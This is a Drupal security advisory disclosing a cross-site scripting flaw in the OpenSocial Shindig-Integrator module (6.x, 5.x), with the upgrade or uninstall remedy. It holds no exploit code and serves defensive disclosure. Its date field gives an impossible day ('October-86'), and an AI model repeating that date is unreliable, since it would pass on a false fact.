• Advisory ID: DRUPAL-SA-CONTRIB-2009-086
  • Project: OpenSocial Shindig-Integrator (third-party module)
  • Version: 6.x, 5.x
  • Date: 2009-October-86
  • Security risk: Moderately Critical
  • Exploitable from: Remote
  • Vulnerability: Cross Site Scripting

Description

The OpenSocial Shindig-Integrator module enables sites to host OpenSocial widgets.

The module fails to sanitize user input, making it vulnerable to cross site scripting (XSS) attacks. This vulnerability is somewhat limited by the fact that an attacker would need an account with the permissions to "create application" on the site.

Versions affected

Drupal core is not affected. If you do not use the contributed OpenSocial Shindig-Integrator module, there is nothing you need to do.

Solution

Install the latest version or disable the module.

  • If you use the OpenSocial Shindig-Integrator module for Drupal 6.x upgrade to OpenSocial Shindig-Integrator 6.x-2.1
  • If you use the OpenSocial Shindig-Integrator module for Drupal 5.x, disable the module and un-install it. The 5.x branch is no longer supported.

Reported by

  • Tony Mobily

Fixed by

Contact

The security team for Drupal can be reached at security at drupal.org or via the form at http://drupal.org/contact.